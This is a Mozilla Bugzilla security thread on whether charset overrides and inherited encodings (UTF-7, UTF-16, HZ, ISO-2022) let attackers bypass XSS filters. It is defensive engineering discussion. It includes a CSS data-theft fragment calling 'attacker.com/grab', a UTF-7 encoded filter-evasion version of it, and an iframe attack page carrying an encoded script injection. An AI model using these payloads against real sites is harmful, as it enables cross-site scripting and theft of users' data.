Closed Bug 603740 Opened 14 years ago Closed 11 years ago

Do not honor charset override from containing document unless same-origin (<link>, <script>, possibly others)

Categories

(Core :: DOM: Core & HTML, defect, P2)

defect

Tracking

()

RESOLVED WORKSFORME
Tracking Status
firefox-esr17 --- wontfix
b2g18 --- wontfix

People

(Reporter: zwol, Assigned: hsivonen)

References

Details

(Keywords: sec-audit, Whiteboard: [sg:audit])

Bug 579744 describes a "universal XSS" attack which uses the @type attribute of <object> to force a nested cross-origin HTML page to be read as if it had been encoded in UTF-7. This permits the attacker to bypass XSS filters on the nested site, which are looking for "<script>" but not "+ADw-script+AD4-". Analogous attacks may be possible using other types of content, loaded via other tags. For instance, <link rel="stylesheet" type="text/css; charset=UTF-7"> might be usable to bypass server-side filters aiming to block the attack described in bug 524223. To be safe, we should audit all code that reads MIME types and/or charsets for included content from the enclosing document, and make sure that this information is only honored when the included content is same-origin with the enclosing document. Servers that are properly configured to send a Content-Type header, with a charset attribute, for all textual content cannot be attacked in this way; but a large minority of servers omit the charset attribute (as discussed in bug 579744) and a smaller but still nontrivial minority don't send Content-Type at all. This is defense-in-depth, since we're not supporting UTF-7 anymore, and all the *known* attacks have received more targeted fixes, but we shouldn't neglect the possiblity that some other supported character set could be used in the same way. (Shift JIS, ISO-2022-JP, and UTF-{16,32} come to mind.) This may not need to be restricted access, being defense-in-depth against largely hypothetical attacks I'll let someone else make that call.
> To be safe, we should audit all code that > reads MIME types and/or charsets for included content from the enclosing > document, and make sure that this information is only honored when the included > content is same-origin with the enclosing document. And add automated tests :)
Whiteboard: [sg:audit][sg:high?]
> to bypass server-side filters aiming to block the attack described in bug > 524223. This is the part I'm not getting. What would the server-side filter be filtering for, and how would affecting the charset of a stylesheet make that not work? > Servers that are properly configured to send a Content-Type header, with a > charset attribute, for all textual content Are a tiny minority, in my experience. Most servers don't send their stylesheets with any sort of charset. Same for scripts. A _lot_ more servers send charsets for HTML than for those. Also, unlike <object> and the like it's very common to have the script and stylesheet references be cross-domain (but within the same site; often coming off some sort of CDN server or dedicated subresource server). So there's nontrivial potential of site breakage here. Combined with the fact that the relevant specs currently call for the behavior we have right now, I'd really like to understand the issues we're trying to address before making changes here.
(In reply to comment #2) > > to bypass server-side filters aiming to block the attack described in bug > > 524223. > > This is the part I'm not getting. What would the server-side filter be > filtering for, and how would affecting the charset of a stylesheet make that > not work? For instance, a server-side filter against bug 524223 might see this (in user-submitted content, which will be embedded into a file that *ought* to be treated as HTML, but per 524223, might get treated as CSS instead): body{background:url("http://attacker.com/grab? and replace the '{' with '&#123;', which blocks the attack. But if the attacker instead sends body+AHs-background:url(+ACI-http://attacker.com/grab? that might skate through the filters, and then the attacking page can use <link rel="stylesheet" type="text/css;charset=utf-7"> to decode the punctuation. This was determined (by the folks who did all the research behind 524223) to work in old IE at least. > > Servers that are properly configured to send a Content-Type header, with a > > charset attribute, for all textual content > > Are a tiny minority, in my experience. Most servers don't send their > stylesheets with any sort of charset. Same for scripts. A _lot_ more > servers send charsets for HTML than for those. Right, and charset on HTML is itself not common, which is why there's a risk here. > Also, unlike <object> and the like it's very common to have the script and > stylesheet references be cross-domain (but within the same site; often coming > off some sort of CDN server or dedicated subresource server). So there's > nontrivial potential of site breakage here. Combined with the fact that the > relevant specs currently call for the behavior we have right now, I'd really > like to understand the issues we're trying to address before making changes > here. I see this as defense-in-depth against attacks we may not yet know about, which are analogous to the attacks in bug 579744 and bug 524223. I'm not sure how to quantify the cost/benefit here.
> a server-side filter against bug 524223 Ah, I see. So this posits that the content being stolen will not be lossy when treated as UTF-7 also, right? I suppose that's plausible... > I'm not sure how to quantify the cost/benefit here. A good start might be getting some data on how often stylesheets are linked to from documents cross-domain and rely on the "inherit charset from the document" or "set charset via @charset" behaviors. For what it's worth, I expect the latter to be less common than the former... That would at least quantify the cost. Quantifying the benefit is harder, but having at least the cost quantified would be good.
It seems to me that the remedy that this bug report calls for is too drastic, since it hasn't been shown that inheriting the charset when the charset is a rough ASCII superset opens up an attack vector. The UTF-7 attack vector is addressed by removing UTF-7 from Gecko as a Web-exposed encoding and by adding it as a special case for mailnews code only. UTF-32 attacks could easily be addressed by removing UTF-32 support altogether as HTML5 says. Opera already removed UTF-32 support. For charsets that are not rough ASCII supersets, I think we should make those never inherit into anything. There's a public bug about this for the inheritance into a frame case: bug 599320. It would be great if the charset alias service indicated whether a charset is a rough ASCII superset.
Seems plausible, but can we come up with a coherent definition of "rough ASCII superset"?
(In reply to comment #6) > Seems plausible, but can we come up with a coherent definition of "rough ASCII > superset"? I was thinking of http://www.whatwg.org/specs/web-apps/current-work/#ascii-compatible-character-encoding There text under http://www.whatwg.org/specs/web-apps/current-work/#charset that deals with flip side of the browser *not* supporting an encoding.
Boris, could you own this and make sure this moves forward, or gets reassigned to someone else if you won't be able to work on this.
Assignee: nobody → bzbarsky
I can take a look, but not till after 2.0. Is that ok?
Priority: -- → P2
Whiteboard: [sg:audit][sg:high?] → [sg:audit]
Keywords: sec-audit
Assignee: bzbarsky → hsivonen
Status: NEW → RESOLVED
Closed: 12 years ago
Resolution: --- → FIXED
Anne, did we decide this isn't actually dangerous? But comment 0 argues that this might bypass some security filters.
I was never sure to what extent this was a real threat. I think it's probably 90+% addressed by disallowing UTF-7 and the non-ASCII-superset CJK encodings in Web content. However, I just filed https://www.w3.org/Bugs/Public/show_bug.cgi?id=20886 on the HTML5 definition of "ASCII compatible character encoding" being too weak to rule out all attacks of this type.
Status: RESOLVED → REOPENED
Resolution: FIXED → ---
Status: REOPENED → ASSIGNED
So I marked this FIXED accidentally. I didn't fix this. At TPAC, we decided not to change this on the assumption that the page needs to trust what it's including. We didn't consider the case where a proxy is second guessing the referring page's trust in the referenced resource. However, if the malicious resource comes over https, the proxy doesn't get to inspect it anyway without a MITM cert. And if we want the world to move to https and we don't want proxies to TLS MITM their users, we aren't really supporting the case of proxies scanning resources. And besides, if proxy didn't inspect the UTF-16 interpretation of unlabeled stuff just in case, it could be fooled with charset="UTF-16" on the <link>/<script> element. Since we don't want to facilitate proxy scanning in the https case and we want every case to become an https case and since the problem scenario assumes a proxy whose security scan is trivially bypassed with charset="UTF-16" on the referring element, I suggest WONTFIX. dveditz, do you agree?
Flags: needinfo?(dveditz)
(In reply to Henri Sivonen (:hsivonen) from comment #12) > So I marked this FIXED accidentally. I didn't fix this. At TPAC, we decided > not to change this on the assumption that the page needs to trust what it's > including. This envisions the attack scenario backward: the *outer* page is the *attacker*. In the original UTF-7 scenario, the attack page would look something like this: <!doctype html> <head><meta charset="utf-7"><title>Gotcha</title></head> <body> <iframe src="http://victim.example/search?q=%2BADw-script%2BAD4-alert%28%22gotcha%22%29%2BADw-/script%2BAD4-"></iframe> </body></html> (That is, ?q=<script>alert("gotcha")</script> with the angle brackets encoded in UTF-7 and then all the punctuation reencoded using %-escapes so it doesn't get mangled before it's supposed to. Not actually tested.) The victim didn't trust anything, it just failed to specify its own charset, so the attacker caused it to be Wrong, and thus bypassed the naive server-side XSS filter on victim.example that was looking for the literal string '<script'. There are several other similar attacks but they all rest upon the *attacker* transcluding the *victim* and overriding the victim's expected charset, not vice versa.
The iframe case is fixed. 1) The encoding doesn't inherit to child browsing contexts cross-origin. 2) UTF-16 doesn't inherit to child browsing contexts even in the same-origin case. 3) If the page is UTF-16 without the charset menu, charset menu can't change that. 4) You can't select UTF-16 from the charset menu. (I.e. #3 and #4 mean the attack doesn't work if the attacker parent convinces the user to touch the charset menu.) 5) UTF-7 no longer exists; the UTF-16 family is the only ASCII-incompatible thing left. The case Anne and I discussed at TPAC was the UTF-16 encoding of the HTML page inheriting into referenced unlabeled JS or CSS. We couldn't come up with an actual attack in that case. Is there an actual attack with JS or CSS inclusion when the only ASCII-incompatible encodings left are the ones that form the UTF-16 family?
> 5) UTF-7 no longer exists; the UTF-16 family is the only ASCII-incompatible thing left. Not true; there's a bunch of variable-byte CJK encodings that reuse ASCII codepoints. Firefox 18 still supports HZ-GB-2312, at least (see the HTML5 bug referenced above). > The case Anne and I discussed at TPAC was the UTF-16 encoding of the HTML page > inheriting into referenced unlabeled JS or CSS. We couldn't come up with an > actual attack in that case. The only thing I can think of right now is, if the victim site serves a JSON document containing private information, with a JS syntax error at the beginning to prevent it being loaded cross-domain by <script>, the attacker *might* somehow be able to neutralize the syntax error by manipulating the character set.
The variable-byte encodings are still ASCII-compatible. (And error handling for them has been carefully adjusted to prevent these kind of problems.)
ASCII-compatible in the HTML5 sense? I'm not confident that definition is strong enough (see the spec bug cited above).
(In reply to Zack Weinberg (:zwol) from comment #15) > > 5) UTF-7 no longer exists; the UTF-16 family is the only ASCII-incompatible thing left. > > Not true; there's a bunch of variable-byte CJK encodings that reuse ASCII > codepoints. Firefox 18 still supports HZ-GB-2312, at least (see the HTML5 > bug referenced above). Whoa. That's terrible. Your demo even roundtrips if you decode it and re-encode it. However, for JS and CSS, stopping inheritance wouldn't defend against attacks that build on this characteristic of the victim encoding. Even if we didn't inherit, the attacker could still use charset="..." on the referring element. Even if we prevented that, it would be enough for the attacker to depend on the fallback encoding (UTF-8 for CSS and Windows-1252 for JS). So to defend against this attack for JS and CSS, we'd have to prevent cross-origin references unless the reference resourced declares its character encoding. Doing that would break the Web for sure. So as far as I can tell, we can't fix this for JS and CSS. Fortunately, at least at present, no one has a demonstration of an attack using JS or CSS victims. For the iframe case, the attack is being defended against it we consider the case where the user just loads something and doesn't touch the character encoding menu. However, the vulnerability you demonstrated in the spec bug is to present if you consider cases where the user can be baited into touching the character encoding menu. That is, if the user switches to another encoding, Gecko honors that. Perhaps we should have more encodings than UTF-16 that don't participate in the character encoding menu. Unfortunately, doing this for non-UTF-16 encodings will be more complex, since non-UTF-16 encodings can be declared using the meta element, so the decision to honor the menu would need to be deferred further.
Flags: needinfo?(dveditz)
(In reply to Henri Sivonen (:hsivonen) from comment #18) > So > to defend against this attack for JS and CSS, we'd have to prevent > cross-origin references unless the reference resourced declares its > character encoding. Or we'd have to flag the resource so that the CSS or JS parser knows to fail hard on ~{
> cases where the user can be baited into touching the character encoding menu Could we make the charset menu only apply to the top page and same-origin frames?
(In reply to Jesse Ruderman from comment #20) > > cases where the user can be baited into touching the character encoding menu > > Could we make the charset menu only apply to the top page and same-origin > frames? We could, but 1) The attacker could bait a user to change the encoding directly on the victim site. 2) We'd have no UI for correcting a bogus encoding in different-origin frames without stuffing cruft in the context menu and even in the context menu the UI would be confusing due to the reload behavior. (Dunno if people really need to change the encoding because of different-origin frames.)
It is worth noting that the vulnerable encodings are not the default anywhere, so HTML encoded using a vulnerable encoding without an encoding label is vulnerable in the simple case of being visited without chardet. To really defend against this problem, we would need to make all the other decoders (UTF-8, Windows-1252, etc.) start to fail hard and emit REPLACEMENT CHARACTERs after bytes that match an escape sequence in the vulnerable encodings if the encoding has been chosen by a mechanism other than labeling (BOM counting as labeling).
(In reply to Henri Sivonen (:hsivonen) from comment #22) > To really defend against this problem, we would need to make all the other > decoders (UTF-8, Windows-1252, etc.) start to fail hard and emit REPLACEMENT > CHARACTERs after bytes that match an escape sequence in the vulnerable > encodings if the encoding has been chosen by a mechanism other than labeling > (BOM counting as labeling). Which, of course, would open up a new attack: Making pages unusable (bunch of REPLACEMENT CHARACTERs) by introducing a HZ or ISO 2022 escape in user-supplied content. So there are two cases here: * Victim pages that use the HZ encoding or an ISO 2022 family encoding and declare it. * Victim pages that use the HZ encoding or an ISO 2022 family encoding and don't declare it. The case where the victim declares the encoding could be addressed by making the charset menu have no effect on such pages. The case where the victim doesn't declare the encoding is fundamentally unsafe. Since HZ or the ISO 2022 encodings aren't the default in any locale, those pages are either always first loaded in a vulnerable state or they depend on chardet not to be vulnerable in some configurations. To make this case not vulnerable, we'd need to make all the *other* decoders work in a bogus way, which would open up a new attack opportunity as noted above. I think the best we can do for these cases is to whine to console and hope that an admin gets notified and migrates the content to a non-vulnerable encoding (preferably UTF-8). Should I just proceed to making the changes to make the charset menu have no effect on labeled HZ and ISO 2022 pages and adding console whines? Or should we first collect telemetry to figure out if this is a Real Problem that merits the complication of making the charset menu processing even more complex than it already is? Or should we be bold enough to make the charset menu only work for unlabeled pages? This would introduce less complexity than making the charset menu have an effect on some (presumably mis-)labeled pages but not others. Should we first collect telemetry on how often users change the encoding on labeled pages? Or something else?
Whining is a definitive win so I think we should go ahead with that. I'd prefer to have data before making more drastic changes, although it's hard to imagine HZ and 2022 to be frequently used.
(In reply to Anne van Kesteren from comment #24) > although it's hard > to imagine HZ and 2022 to be frequently used. Right. And the key is use on sites with user-supplied content. Static legacy sites should be safe enough.
Filed bug 840476 about telemetry on charset menu use on labeled vs. unlabeled pages.
(In reply to Anne van Kesteren from comment #24) > Whining is a definitive win so I think we should go ahead with that. I'd > prefer to have data before making more drastic changes, although it's hard > to imagine HZ and 2022 to be frequently used. Except ISO-2022-JP. Fortunately, IE stopped to support unlabeled ISO-2022-JP pages, so the impact would be lower than it used to be.
Some Japanese pages encoded in Shift_JIS mislabel them as ISO-2022-JP because IE's ISO-2022-JP decoder happily decodes Shift_JIS text.
(In reply to Masatoshi Kimura [:emk] from comment #28) > Some Japanese pages encoded in Shift_JIS mislabel them as ISO-2022-JP > because IE's ISO-2022-JP decoder happily decodes Shift_JIS text. Why don't we do that? What would be the downsides of doing that (and putting it in the Encoding Standard)?
I'm fine with updating our implementation if the Encoding Standard is updated.
(In reply to Masatoshi Kimura [:emk] from comment #30) > I'm fine with updating our implementation if the Encoding Standard is > updated. Let's do that. I have round-trippable PoCs for HZ and ISO-2022-JP at: http://hsivonen.iki.fi/p/charset-xss/ (Round-trippable in the sense that a HZ or ISO-2022-JP encoder could produce those bytes.) I didn't come up with round-trippable PoCs for ISO-2022-KR and ISO-2022-CN yet. Do we believe that neither the Web nor email needs ISO-2022-KR or ISO-2022-CN? What about HZ?
Sigh. Looks like Chrome added ISO-2022-KR and -CN back instead of making pages so declared not load: https://code.google.com/p/chromium/issues/detail?id=15701 We should probably remove the HZ, -KR and -CN decoders and make pages that declare those not load (i.e. not fall back to something else). Then we need to make pages that declare -JP unoverridable.
See also http://zaynar.co.uk/docs/charset-encoding-xss.html for previously disclosed attacks.
Not sure we'd fix this on an ESR branch but marking affected so we come back later and check.
I suggest the following path forward: 1) Introduce the replacement encoding from https://www.w3.org/Bugs/Public/show_bug.cgi?id=21057 to Gecko. 2) Remove the ISO-2022-KR, ISO-2022-CN and HZ-GB-2312 decoders and encoders. 3) Map all their aliases to the replacement encoding. 4) Make the detectors never decide that content is encoded in ISO-2022-KR, ISO-2022-CN or HZ-GB-2312. (Simplified Chinese and Korean already ship with detector off, so sites relying on autodetection are already vulnerable.) 5) Make the ISO-2022-JP decoder support Shift_JIS byte sequences, too, in a way compatible with IE. 6) See how the change from point #5 affects charset menu telemetry (bug 840476 and bug 843586) and either: a) Make the menu have no effect when the page has an encoding label. b) Make the menu have no effect if the page declares ISO-2022-JP.
(In reply to Henri Sivonen (:hsivonen) from comment #36) > I suggest the following path forward: > > 1) Introduce the replacement encoding from > 2) Remove the ISO-2022-KR, ISO-2022-CN and HZ-GB-2312 decoders and encoders. We already banned ISO-2022-CN decoder. > 3) Map all their aliases to the replacement encoding. I don't think the replacement decoder is needed for ISO-2022-CN because IE has never been supported the label "ISO-2022-CN".
It still seems better to not expose sites to a potential hole if their server inadvertently does support iso-2022-cn and they're silly enough to let that be controlled via the URL.
I'm saying we can just remove ISO-2022-CN decoder without bothered with the replacement decoder.
(In reply to Masatoshi Kimura [:emk] from comment #39) > I'm saying we can just remove ISO-2022-CN decoder without bothered with the > replacement decoder. Bugzilla archeology suggests people may have email archives that depend on that encoding, so we'll probably need to make Thunderbird support it for email the way we did for UTF-7. When you say “banned”, do you mean banned only from the browser or from mailnews, too?
Depends on: 863728
Anne, can you remind me why the spec doesn't map HZ and UTF-7 to the replacement encoding?
Per https://www.w3.org/Bugs/Public/show_bug.cgi?id=21057 you thought utf-7 might be relying on fallback. hz-gb-2312 is not obsolete yet and I haven't had requests to remove that encoding.
What kind of usage data is there about HZ? HZ is much easier to write exploits for than iso-2022. I was hoping making HZ no longer a danger would be a higher priority than 2022.
I don't know. We can investigate removing that encoding separately.
So, we know of these dangerous encodings: * UTF-7 * UTF-16 * UTF-32 * HZ-GB-2312 * ISO-2022-CN * ISO-2022-KR * ISO-2022-JP Each needs to be considered in two ways: * Is it dangerous to interpret text that the site thinks is in a non-dangerous encoding as a dangerous encoding? * Is it dangerous to interpret text that the site thinks is in a dangerous encoding as a non-dangerous encodings? Avenues of attack include: * The character encoding menu (both directions) * Inheritance to child frames (both directions) * Server-side script allows a URL parameter define the output encoding (dangerous interpreted as non-dangerous if treated as unknown) Additionally, this bug report guesses that inheritance into CSS or JS could be an attack. Let's look at each of the encodings: # UTF-7 Firefox cannot be tricked into interpreting non-UTF-7 as UTF-7, which would be dangerous, because Firefox doesn't support UTF-7. Firefox can trivially be, even without involving the menu, be made treat UTF-7 as non-UTF-7. Whether this is dangerous needs to be analyzed. # UTF-16 Interpreting UTF-16 as non-UTF-16 would be dangerous. Assuming that \0 doesn't pass through filters, the reverse isn't a problem. UTF-16 attacks are now mitigated by: * Making UTF-16 unoverridable from the menu. * Making UTF-16 not available in the menu. * Making UTF-16 not inherit to child frames even same-origin. # UTF-32 Firefox cannot be tricked into interpreting non-UTF-32 as UTF-32, because Firefox doesn't support UTF-32. Firefox can trivially be, even without involving the menu, be made treat UTF-32 as non-UTF-32. I *think* this is not dangerous, because every four bytes of UTF-32 always contains one zero byte. # HZ-GB-2312 Treating non-HZ-GB-2312 as HZ-GB-2312 is exceptionally dangerous. It will be mitigated by removing HZ-GB-2312 from the menu when bug 805374 lands. Treating HZ-GB-2312 as non-HZ-GB-2312 is potentially dangerous as well. As of today, it is mitigated by making HZ-GB-2312 unoverridable from the menu (bug 941562) and making HZ-GB-2312 not inherit into child frames even same-origin. In six months, we should have telemetry data from bug 935453 to evaluate whether to map HZ to the replacement encoding. # ISO-2022-KR and ISO-2022-CN As of today, ISO-2022-[KR|CN] cannot be treated as non-ISO-2022-[KR|CN], because they map to the replacement encoding (bug 863728). The possibility of treating non-ISO-2022-[KR|CN] as ISO-2022-[KR|CN] goes away when bug 805374 lands. # ISO-2022-JP This encoding still needs more work. We should consider supporting Shift_JIS sequences in ISO-2022-JP labeled pages (per comment 28) to reduce the probability of the user having a case to override ISO-2022-JP into non-ISO-2022-JP and then make ISO-2022-JP unoverridable. Since IE11 gets away with not having a menu item for ISO-2022-JP, we should consider removing the menu item, too. - - As for the original concern that this bug was reported for, inheritance into CSS and JS, in the absence of a proof-of-concept attack, I'm reluctant to make any changes to how inheritance into CSS or JS works. Bug 871161 removed inheritance via window.open() and <form> POST. I'm inclined to * File a bug for investigating whether interpreting UTF-7 as non-UTF-7 can be dangerous as part of an attack based on a server-side script accepting an arbitrary output encoding, including UTF-7, as an untrusted parameter (to decide if we should map it to the replacement encoding). * File a bug to remove ISO-2022-JP from the menu. * File a bug to make the ISO-2022-JP decoder support Shift_JIS sequences. * File a bug to make ISO-2022-JP unoverridable once the decoder supports Shift_JIS sequences. * Mark this bug as WFM. Zack, would that be a satisfactory response to this bug report?
If we remove ISO-2022-JP from the menu, you could still select it via the auto-detect option We could map utf-32 to the replacement encoding I suppose. There's no value in that encoding either way. I'm not aware of the details of utf-7. Is it still usable when decoded per utf-8?
(In reply to Henri Sivonen (:hsivonen) from comment #45) > I'm inclined to > > * File a bug for investigating whether interpreting UTF-7 as non-UTF-7 can > be dangerous as part of an attack based on a server-side script accepting an > arbitrary output encoding, including UTF-7, as an untrusted parameter (to > decide if we should map it to the replacement encoding). > > * File a bug to remove ISO-2022-JP from the menu. > > * File a bug to make the ISO-2022-JP decoder support Shift_JIS sequences. > > * File a bug to make ISO-2022-JP unoverridable once the decoder supports > Shift_JIS sequences. > > * Mark this bug as WFM. > > Zack, would that be a satisfactory response to this bug report? Given that nobody has yet managed to come up with a JS or CSS exploit, yeah, I could live with that. Has anyone seriously tried to think of one, though?
Being able to force the encoding of CSS/JS does not make it easier to read data from it cross-origin. In case of errors in execution all that is nullified. CSS cannot be read either way. The only other case I can imagine is that some origin with sensitive data also allows uploading arbitrary text files and embedding those as CSS/JS (maybe through XSS) but scans the text files for CSS/JS but does not consider alternate encodings.
(In reply to Anne (:annevk) from comment #46) > If we remove ISO-2022-JP from the menu, you could still select it via the > auto-detect option Yeah. ISO-2022-JP detection not being consistent across configurations and across different browsers is not ideal. > We could map utf-32 to the replacement encoding I suppose. We could, just in case, yeah, but it seems to me that interpreting UTF-32 as UTF-8 or windows-1252 is safe anyway. Now that I think about it more, the danger case is when little-endian UTF-32 is BOM-sniffed as UTF-16LE. In this case, the BOM takes precedence over labels, so mapping labels to "replacement" won't help. This case is basically http://hsivonen.com/test/moz/never-show-user-supplied-content-as-utf-16.htm but with UTF-32LE dropped to UTF-16LE instead of UTF-16 dropped to an 8-bit encoding. I'm rather unamused about the existence of UTF-32. As if making up new UTFs was harmless. :-( > I'm not aware of the details of utf-7. Is it > still usable when decoded per utf-8? You can read ASCII letters, digits and some punctuation if UTF-7 is interpreted as UTF-8 or windows-1252, so there's some value in not just mapping it to replacement. This should even be safe, because the byte sequences that don't represent the same characters as they would in US-ASCII are sequences of +, - and letters. That is, a server-side script can't be fooled into emitting a '<' byte by asking it to output UTF-7. (In reply to Zack Weinberg (:zwol) from comment #47) > Has anyone seriously tried to think of one, though? Maybe not truly seriously, but I have tried to think of one. The case where the CSS/JS file is actually meant to be in a dangerous encoding, is not labeled and relies on inheriting the dangers encoding from HTML from the same site but the encoding changes when the CSS/JS file is included on another site whose HTML uses a non-dangerous encoding is something that we can't do anything about unless start sniffing all unlabeled CSS/JS for byte patterns of the dangerous encodings, which I assume we don't want to do. But if a site was crazy enough to serve JS as unlabeled HZ *and* is crazy enough to, under that circumstance, accept user-supplied strings to be included in the JS, sure, that would be dangerous to interpret as non-HZ. Should we try to protect hypothetical sites that are that crazy? So let's consider where the unlabeled CSS/JS is in a non-dangerous encoding and is included in an HTML file that's in a dangerous encoding. If the malicious host is in UTF-16, the CSS/JS file doesn't decode to the Basic Platinum range at all and won't have any CSS effect and won't compile as JS. This case, therefore, seems harmless. For HZ and ISO-2022-JP, the attack that I can think of would be that there are two user-supplied string literals in the CSS or JS file and the attacker shifts to non-ASCII in the first and and back to ASCII in the second one turning the two string literals into one and turning all CSS/JS in between the literals into mojibake inside the combined literal. It seems improbable that suitable circumstances would arise to offer two slots for user-supplied strings in external .css or .js. It seems even more improbable that deleting code between the literals would result in an exploitable condition.
(In reply to Henri Sivonen (:hsivonen) from comment #49) > Now that I think about it more, the danger case is when little-endian > UTF-32 is BOM-sniffed as UTF-16LE. In this case, the BOM takes precedence > over labels, so mapping labels to "replacement" won't help. > > This case is basically > http://hsivonen.com/test/moz/never-show-user-supplied-content-as-utf-16.htm > but with UTF-32LE dropped to UTF-16LE instead of UTF-16 dropped to an 8-bit > encoding. > > I'm rather unamused about the existence of UTF-32. As if making up new UTFs > was harmless. :-( I just tried writing a proof of concept attack along these lines. Fortunately, this attack doesn't actually work, because any attack would require the little-endian UTF-32 encoder to produce the following byte pattern: printable ASCII byte, 0x00, printable ASCII byte, 0x00. The bits needed for the second ASCII letter byte in a 4-byte sequence always push the little-endian 32-bit interpretation of those 4 bytes to represent a number that's greater than 0x10FFFF, because printable ASCII is > 0x10. Hooray! No security patch to write for this one. (In reply to Henri Sivonen (:hsivonen) from comment #49) > The case where the CSS/JS file is actually meant to be in a dangerous > encoding, is not labeled and relies on inheriting the dangers encoding from > HTML from the same site but the encoding changes when the CSS/JS file is > included on another site whose HTML uses a non-dangerous encoding is > something that we can't do anything about unless start sniffing all > unlabeled CSS/JS for byte patterns of the dangerous encodings, which I > assume we don't want to do. But if a site was crazy enough to serve JS as > unlabeled HZ *and* is crazy enough to, under that circumstance, accept > user-supplied strings to be included in the JS, sure, that would be > dangerous to interpret as non-HZ. Should we try to protect hypothetical > sites that are that crazy? I say we shouldn't, because protecting against this case would require us to reject unlabeled CSS and JS files that contain the bytes whose ASCII interpretation is tilde followed by open brace. That combination plausible to be rejected in order to protect HZ sites from the dangers of HZ. Protecting ISO-2022-JP sites from the dangers of ISO-2022-JP would be more plausible, because we'd only need to reject any CSS or JS file that contains the character U+001B, which is non-printable. Still, I'm not convinced that doing so would be worthwhile.
The 0x10FFFF limit will eventually have to be raised - I don't care what anyone says to the contrary; we will need more than 1.1 million codepoints in the very long run - but by then hopefully we won't have UTF-16 to kick around anymore. > That combination plausible to be rejected ... I assume you meant "that combination is too plausible to be rejected ..."? If so, I concur.
Raising that limit would break JavaScript (and therefore the web). In any event it seems highly unlikely that it will ever be raised. Out of 16 planes 10 are unassigned.
(In reply to Zack Weinberg (:zwol) from comment #51) > The 0x10FFFF limit will eventually have to be raised - I don't care what > anyone says to the contrary; we will need more than 1.1 million codepoints > in the very long run - but by then hopefully we won't have UTF-16 to kick > around anymore. There a points unassigned below 0x10FFFF and despite Emoji, we can still make new meaning by making new strings of existing characters. Also, it will very hard, likely prohibitively hard, to get rid of UTF-16 as an in-memory representation in many environments, including the Web platform. Anyway, if we ever go past 0x10FFFF and get rid of UTF-16 as an in-memory representation, chances are that we will have gotten rid of UTF-16 as an interchange encoding first, so I'm not too worried about relying on 0x10 being lower than printable ASCII as a defense against UTF-32 attacks. > > That combination plausible to be rejected ... > > I assume you meant "that combination is too plausible to be rejected ..."? > If so, I concur. Yes. A word got dropped there. Follow-ups: * Bug 943256 - Remove ISO-2022-JP from the menu. * Bug 945201 - Make ISO-2022-JP unoverridable from the menu. * Bug 945202 - Shift_JIS sequences in ISO-2022-JP decoder. * Bug 945215 - Consider mapping HZ to the replacement encoding. Not really a follow-up but related to the above three bugs: * Bug 945213 - Align our Japanese detection with Trident or WebKit Resolving this bug as WFM per earlier comments. If someone comes up with a realistic attack for interpreting ISO-2022-JP CSS/JS as non-ISO-2022-JP, let's open a new bug about making the CSS and JS parsers halt upon seeing U+001B. I don't see us adding a browser-side defense for the analogous HZ scenario even if someone did show a plausible attack. For the reserve HZ scenario, the best we could do would be mapping HZ to the replacement encoding. Whether that's feasible is an open question pending telemetry.
Status: ASSIGNED → RESOLVED
Closed: 12 years ago11 years ago
Resolution: --- → WORKSFORME
(In reply to Anne (:annevk) from comment #52) > Raising that limit would break JavaScript (and therefore the web). Yes, but nonetheless, eventually we will have to do it. > Out of 16 planes 10 are unassigned. Linear extrapolation from allocations so far predicts exhaustion circa 2250. I consider that an unlikely, ideal scenario; I expect those 10 planes to be gobbled up in huge chunks, with exhaustion more probably around *20*50. However, either way I do understand if you think this is not worth worrying about at this time. (In reply to Henri Sivonen (:hsivonen) from comment #53) > Anyway, if we ever go past 0x10FFFF and get rid of UTF-16 as an > in-memory representation, chances are that we will have gotten > rid of UTF-16 as an interchange encoding first Right, that was what I meant by "won't have UTF-16 to kick around anymore".
Unhiding as requested by :annevk on IRC.
Group: core-security
You need to log in before you can comment on or make changes to this bug.